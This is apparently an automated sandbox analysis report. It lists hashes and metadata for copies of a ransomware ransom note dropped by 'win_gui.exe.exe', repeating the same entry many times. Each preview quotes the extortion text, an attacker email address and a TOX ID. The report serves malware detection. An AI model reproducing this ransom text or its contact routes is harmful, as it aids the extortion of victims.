                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
